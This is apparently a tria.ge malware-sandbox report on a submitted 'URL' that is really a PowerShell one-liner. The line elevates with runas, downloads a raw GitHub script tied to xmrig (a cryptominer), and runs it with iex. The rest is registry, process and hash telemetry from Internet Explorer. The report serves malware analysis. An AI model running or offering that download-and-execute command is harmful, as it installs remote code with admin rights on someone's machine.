Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
27/06/2024, 01:39
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win7-20231129-en
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 1848 iexplore.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b4bbbf2ad8230548976d2479e5e920f90000000002000000000010660000000100002000000037c7e86b8ae6d309c8a57d8b3471296d5efb561b01700856f1870552feaf8f62000000000e8000000002000020000000903bb79a7a9fd42bbc43da4a5b3567ae144765e3ded667dc081fe4caae82c8e0200000004265fde9a98c8bff92c8b6be8eba76792a7f052a66a5caa3bd47f9df3c586dbc400000008121fa39293c8de5388e59ad404de0509b340f85b65ab29cd580b7bbf41f7a83aea775cb9eb917600c7dc52c62d1f1f978f5ba635e15a6912cb4271edcff02ce iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425614284" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{273A8961-3426-11EF-8221-D669B05BD432} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20f3e1fb32c8da01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b4bbbf2ad8230548976d2479e5e920f900000000020000000000106600000001000020000000ba0fd0b5fde5b877db979f6bc346558304fbf363651d4d8dd1745146f437d89c000000000e800000000200002000000029ee7b103e54de1205c4cdd2841cce5d72c77842acf695b6d5022451165b6967900000006301c475bb6ec09ea824369dbe6d489657908cc18714074f46dd4fd2004c3d185ad25a38e6012d6cc8df2c117e801dc8c9c134db2734443ecd82b7fc23989959273d4aecd7ba8f114849543a99e1e2427b96f161f4917cf90dd85160ed847d653d03e57d1bc4ff22de042ab45765c7d913ca21a98e2664622f815384d4ba9de8c161481d36caa52e9fafbf0ed831d623400000001068f3ba230ce44e802c9436de44a637ff206a9848848556af4888a4323ab334890a8b4709f5d630048377aeedcc1b6f5d4f9a315753dc6241fe5e2fe58a13e4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1848 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1848 iexplore.exe 1848 iexplore.exe 1196 IEXPLORE.EXE 1196 IEXPLORE.EXE 1196 IEXPLORE.EXE 1196 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1848 wrote to memory of 1196 1848 iexplore.exe 28 PID 1848 wrote to memory of 1196 1848 iexplore.exe 28 PID 1848 wrote to memory of 1196 1848 iexplore.exe 28 PID 1848 wrote to memory of 1196 1848 iexplore.exe 28
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"1⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1848 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1196
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2188
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" SYSTEM1⤵PID:2404
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:1364
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5336f38a3c469393c7b5e1bbef78154ea
SHA131a4c8e93c8610131429abf745a296a621b7476a
SHA2569c50d1051613f2888c4b8b2b938b8c89b615a8c0a24276fde434546b7f71790b
SHA512cd089e1e306270ce391a2fd89f68e8dd7b578bcb210461f7b324e79bf9a976c17056d8938360319f7eceea3db96c332d568bdae99ad94a069c65e8128a048162
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57d314bb6f7a8b46693c793d7f24829c9
SHA139d14b7ab503136ece599633df8e14a99d2a26cb
SHA256ce06e3272b2a27716c7b0ac07839dfb47276245abe43c5b11ff953e5dcdc40e4
SHA512134c5a0fdea24c3300fed791d5ec6c558dfd6172f52cd2f5404cc644e33f9d07458a6eaea9e223a9f29ecda0627c41149cecf3ef36fef932bd4fd8b46be7c979
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56c7c9e68d2777d54b613edd3455ebf77
SHA13ae939d1b01cbda284bf0fef63c7f6e272e9b797
SHA256e3bcb799f24f43f8ca5d597611e4c1288f6422aece6d082f5b920d5cf1ce73e4
SHA5125692a43215f93045055fa81bb57473f88122e8677d3d3263e5aa3938bf1b89557519a602fa13c1bd6f2b288795fef33ce866bd7b234bde1154a5529a21acd8ff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55298023add06cc028173dad42131eb51
SHA15532f13c180d5dc77d6dce588545b65e2aac44bf
SHA25631dbddad3c1240d2b73327d41e72d8c400a36e27700e77ec2edac4eaf3a12b18
SHA5124c2cf8845985c0cd79bd92cbad12e2b789fbbab8600af6ecd16c2a84a3df122a5ec3e7b60521d14a344dc21ce811db7287cf2063c84a54c35439781876f27027
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c373839578f5357fb088088fb6ec7766
SHA1a29029ee738fcdba3c3727bdf7c5da25d3a7c4b3
SHA256d9b1c45f9ab818c88dbe363ba255dec59ebb3f9319e6d0913d83f0cd459a99ef
SHA512a4c1694c53ca64db11dbca51cbe4f7681dbb107064a71cee7f53a68c3911526714a38eedaeabf42ebf16296927ff10ec7fb525c28180b4603afb022ec83deeb3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD553caf46b4a33efbd7c8bf428ad25a680
SHA187e54600e61590a5f0936f00b80f75f60f45faac
SHA256a26643a286630cb32064b7c76a5b3ed145425dc916bc0fb7222ff582773653e7
SHA51208632031604719635eda624d82622603b07c2b15ddb328342c3260955950c4c506cb96ea018be3811c310a333d6f703c96efae4b6384981d193884cd7e61b870
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD597bc235856496c08fb8b1974645a3957
SHA1062c1fbce6bb2e6a0d55fa04aee5356822bb5740
SHA256067ca7d7c971bfd5dd97fe804b57a3e5c6698fa8c00e96bf878dc0d3c8481469
SHA512bcb9c5303ee6cb4bef8c2915ff8bf80208f125ff30c6756be94b5e2e21f1d304b30e6bf93f0aafc1faefcbb8e3ef37e18b11badce2417dd45def2b46cb883729
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD549843f3aae8300d7ce4e258805ccd553
SHA14d8cc49c214e57034a469e2573a4c9e578405bc5
SHA256a5c9cced7adc8ed41282f12cec845e2c664f6bd4291d54a0838d0f195cb62a58
SHA5126711a39656e84750ada86f0c3d6a6e1e54e564d154efe0bc85acf90a7d4a16bd431cd166fdcc13489f042253483c2bf8b320886893a5207f9ecb7138d0403cbb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58e104dec98613b4fc556839a3f58d51a
SHA108c7d41658590a3594d8756665db98b8e0f9a6b0
SHA256d5457314d70db39ae4d7711aa59265a0807e0da7e9f8fcd4338a0cdcb885dc28
SHA5123caf5aea3bd27f175f104d0cb6bed0374822b5f2fd762beb596e3ce28a55dca1125adf7fc22aa9a5a0b6b18a7da02066d4e7f4d412aca979729b43e91b5261a5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a72ce72d1102ae14279ed046648708f1
SHA1ba26c27919520f632b5de246da1908b773cd719b
SHA2563677a4499437b4fdcebbdc2f4eba8b1a45fb1e5ef56b5096434080617b46660c
SHA5121607d672d93506e7a90e5a761e2d537f92bf661bd5c78df17f8ed196323b34e1bd66b847536d15d26eb514bf20eb06037d4c252142cbed5572adaa090a58ee09
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59f469956d0d4dff12a62574799594892
SHA198037de63366d1d5459f8f23e80bd958de6f427c
SHA2569ad4122c6b46d379d4d1cbf6b56ced88bbb795b585230e3a629cf97693253f62
SHA512cc73ffa52c14069c4ddd62aaa5dd657dfaad51d3c9a11b3235364e593296ca2766d20c68a675f47ec67c48f7d8211e2c422dce9b9496d4e6d91674a62cbe6728
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD590668cb0013f40c6cc99adccea7039c8
SHA191e513ff0adba79c8486ab39338186a74c652824
SHA25662f9892939e8cf650f5a94192a6be667bae98d37d0ec561638d264e2325ac831
SHA512b1a04860e723fc149571764ef69e2ddea682371d463c2f046e5cb090d8b10aa33d71a6e7262ecff0a7e815cf6e59cfc039bafb00362074ad1687a5836d2623e6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Filesize4KB
MD5da597791be3b6e732f0bc8b20e38ee62
SHA11125c45d285c360542027d7554a5c442288974de
SHA2565b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b